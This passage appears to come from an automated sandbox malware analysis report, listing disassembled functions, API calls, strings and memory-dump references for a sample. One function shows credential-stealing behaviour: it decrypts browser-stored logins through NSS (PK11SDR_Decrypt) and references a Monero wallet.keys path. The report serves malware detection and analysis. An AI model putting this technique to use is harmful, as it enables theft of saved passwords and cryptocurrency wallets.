Instruction Fuzzy Hash: 8E3116B254D644DFD3002E6B9D4073AB7E9A7D0310F76452EEAC267300E6F554E1AECA

Function 00B47A20 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fab9c17a174072b84d08adf7f69c9dc29cabbb8dd64d5188409ffc3eb4dd234c
Instruction ID: ecda825011606c65e732006d218965cf5a33c5878d293e261f4fff522045d722
Opcode Fuzzy Hash: fab9c17a174072b84d08adf7f69c9dc29cabbb8dd64d5188409ffc3eb4dd234c
Instruction Fuzzy Hash: 5C4181F3E186104BE304AA29CC4536AB7D6EBD5324F1B463CDBD8D7394E939981187C6

Function 00D42AAE Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aaa822be06bf22d8ff03d16da0e8862b5850574cc193ecfed52ab09b0a632ca
Instruction ID: 72907aeeecc404a34ace6c9ccfd9209c6b5447506bf48020a8ec10aadcd5cf8f
Opcode Fuzzy Hash: 3aaa822be06bf22d8ff03d16da0e8862b5850574cc193ecfed52ab09b0a632ca
Instruction Fuzzy Hash: 9E315AB251C704DFE70DBF28E84667AFBE5EF54300F06492DE6D582A50EA3154808B87

Function 008A9750 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 6C6B55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C68E1A5), ref: 6C6B5606
LoadLibraryW.KERNEL32(gdi32,?,6C68E1A5), ref: 6C6B560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C6B5633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C6B563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C6B566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C6B567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C6B5696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C6B56B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C6B56CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C6B56E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C6B56FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C6B5716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C6B572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C6B5748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C6B5761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C6B577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C6B5793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C6B57A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C6B57BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C6B57D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C6B57EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C6B57FF

Strings

SetWindowPos, xrefs: 6C6B56F7
ReleaseDC, xrefs: 6C6B5742
AreDpiAwarenessContextsEqual, xrefs: 6C6B5637
ShowWindow, xrefs: 6C6B56DE
user32, xrefs: 6C6B5601
GetDpiForWindow, xrefs: 6C6B5690
GetWindowDC, xrefs: 6C6B5710
LoadIconW, xrefs: 6C6B575B
SetWindowLongPtrW, xrefs: 6C6B57B7
EnableNonClientDpiScaling, xrefs: 6C6B5666
RegisterClassW, xrefs: 6C6B56AC
gdi32, xrefs: 6C6B560A
StretchDIBits, xrefs: 6C6B57CC
DeleteObject, xrefs: 6C6B57F9
LoadCursorW, xrefs: 6C6B5774
FillRect, xrefs: 6C6B5729
GetMonitorInfoW, xrefs: 6C6B57A2
CreateWindowExW, xrefs: 6C6B56C5
GetSystemMetricsForDpi, xrefs: 6C6B5677
CreateSolidBrush, xrefs: 6C6B57E4
MonitorFromWindow, xrefs: 6C6B578D
GetThreadDpiAwarenessContext, xrefs: 6C6B562D

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: 94b76636f99ffd07114a4f151aec59dcb6d2598d60fa7d4b3905766af542c8f8
Instruction ID: b3b9cb022db72f0e9f9477c7989f80cbda05744432ed32d297e3daa30a732aad
Opcode Fuzzy Hash: 94b76636f99ffd07114a4f151aec59dcb6d2598d60fa7d4b3905766af542c8f8
Instruction Fuzzy Hash: 965169707113235BDB009F36CD84A663AF8AB4A785F114925AA21F3A55EFB0F811CF6D

Function 6C69CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C66582D), ref: 6C69CC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C66582D), ref: 6C69CC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C6CFE98,?,?,?,?,?,6C66582D), ref: 6C69CC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C66582D), ref: 6C69CC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C66582D), ref: 6C69CC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C66582D), ref: 6C69CC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C66582D), ref: 6C69CCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C69CCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C69CCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C69CCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C69CCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C69CD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C69CD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C69CD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C69CDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C69CDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C69CDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C69CDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C69CE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C69CE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C69CE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C69CE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C69CE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C69CE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C69CE8A

Strings

nativeallocations, xrefs: 6C69CDA8
default, xrefs: 6C69CC21
fileioall, xrefs: 6C69CCA8
jsallocations, xrefs: 6C69CD0E
seqstyle, xrefs: 6C69CCE6
unregisteredthreads, xrefs: 6C69CE58
fileio, xrefs: 6C69CC92
noiostacks, xrefs: 6C69CCBE
audiocallbacktracing, xrefs: 6C69CDD4
preferencereads, xrefs: 6C69CD92
nostacksampling, xrefs: 6C69CD7C
stackwalk, xrefs: 6C69CCF8
Unrecognized feature "%s"., xrefs: 6C69CEA0
processcpu, xrefs: 6C69CE6E
markersallthreads, xrefs: 6C69CE42
samplingallthreads, xrefs: 6C69CE2C
ipcmessages, xrefs: 6C69CDBE
cpuallthreads, xrefs: 6C69CE16
power, xrefs: 6C69CE84
screenshots, xrefs: 6C69CCD4
mainthreadio, xrefs: 6C69CC7C
leaf, xrefs: 6C69CC66
java, xrefs: 6C69CC37
notimerresolutionchange, xrefs: 6C69CE00

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 602cefd0f958e7c68f7242adeed9a91ecb3ecbc503f71a6bb229bb2c15ae9e18
Instruction ID: 86e23dd8be6c638818287a695d03abbef18e979f159a2decd0edf4e43f665e4b
Opcode Fuzzy Hash: 602cefd0f958e7c68f7242adeed9a91ecb3ecbc503f71a6bb229bb2c15ae9e18
Instruction Fuzzy Hash: D05142D1B4562772FA0531156D20BEA1485EF5334AF14443AEE1BA2E90FB05E70FCAAF

Function 6C664470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C664730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6644B2,6C6DE21C,6C6DF7F8), ref: 6C66473E
Part of subcall function 6C664730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C66474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C6644BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C6644D2
InitOnceExecuteOnce.KERNEL32(6C6DF80C,6C65F240,?,?), ref: 6C66451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C66455C
LoadLibraryW.KERNEL32(?), ref: 6C664592
InitializeCriticalSection.KERNEL32(6C6DF770), ref: 6C6645A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C6645AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C6645BB
InitOnceExecuteOnce.KERNEL32(6C6DF818,6C65F240,?,?), ref: 6C664612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C664636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C664644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C66466D
VerSetConditionMask.NTDLL ref: 6C66469F
VerSetConditionMask.NTDLL ref: 6C6646AB
VerSetConditionMask.NTDLL ref: 6C6646B2
VerSetConditionMask.NTDLL ref: 6C6646B9
VerSetConditionMask.NTDLL ref: 6C6646C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6646CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C6646F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C6646FD

Strings

user32.dll, xrefs: 6C664557, 6C66463F
kernel32.dll, xrefs: 6C6644CD
WRusr.dll, xrefs: 6C6644B5
l, xrefs: 6C664578
Gml, xrefs: 6C6644FC
NativeNtBlockSet_Write, xrefs: 6C6646F7

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: Gml$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-884719140
Opcode ID: 7f36ea0ce7a6cd817d4207c682ef3097cf320b583f35835c022c5327a6ca0a1b
Instruction ID: eab5048da82757be091df25168019b24db7482201df077dfba6ea1edc53506d4
Opcode Fuzzy Hash: 7f36ea0ce7a6cd817d4207c682ef3097cf320b583f35835c022c5327a6ca0a1b
Instruction Fuzzy Hash: AE6106B0604244AFEB00DF63D895BA57BB8EF86348F04C458E5049BA41D7F1AA85CF9F

Function 0089C990 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 0089C9A5

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0156CA90,00000000,?,008B144C,00000000,?,?), ref: 0089CA6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0089CA89
GetFileSize.KERNEL32(00000000,00000000), ref: 0089CA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0089CAA8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0089CAD9
StrStrA.SHLWAPI(?,0156C9A0,008B0B52), ref: 0089CAF7
StrStrA.SHLWAPI(00000000,0156C9D0), ref: 0089CB1E
StrStrA.SHLWAPI(?,0156D5D8,00000000,?,008B1458,00000000,?,00000000,00000000,?,01568980,00000000,?,008B1454,00000000,?), ref: 0089CCA2
StrStrA.SHLWAPI(00000000,0156D638), ref: 0089CCB9

Part of subcall function 0089C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0089C871
Part of subcall function 0089C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0089C87C
Part of subcall function 0089C820: PK11_GetInternalKeySlot.NSS3 ref: 0089C88A
Part of subcall function 0089C820: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0089C8A5
Part of subcall function 0089C820: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0089C8EB
Part of subcall function 0089C820: PK11_FreeSlot.NSS3(?), ref: 0089C961

StrStrA.SHLWAPI(?,0156D638,00000000,?,008B145C,00000000,?,00000000,015689D0), ref: 0089CD5A
StrStrA.SHLWAPI(00000000,01568AC0), ref: 0089CD71

Part of subcall function 0089C820: lstrcat.KERNEL32(?,008B0B46), ref: 0089C943
Part of subcall function 0089C820: lstrcat.KERNEL32(?,008B0B47), ref: 0089C957
Part of subcall function 0089C820: lstrcat.KERNEL32(?,008B0B4E), ref: 0089C978

lstrlen.KERNEL32(00000000), ref: 0089CE44
CloseHandle.KERNEL32(00000000), ref: 0089CE9C
NSS_Shutdown.NSS3 ref: 0089CEAA

Strings

, xrefs: 0089C9C6

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeString
String ID:
API String ID: 1052888304-3916222277
Opcode ID: 2ef3c9a437c31515c6cd9a8ec9c019b5a23cda245ad01e4f5e12b485fccb953a
Instruction ID: cb613a277ef5d4aa279c096be368f1fbce9615b6faf7c793bf628a90943b1050
Opcode Fuzzy Hash: 2ef3c9a437c31515c6cd9a8ec9c019b5a23cda245ad01e4f5e12b485fccb953a
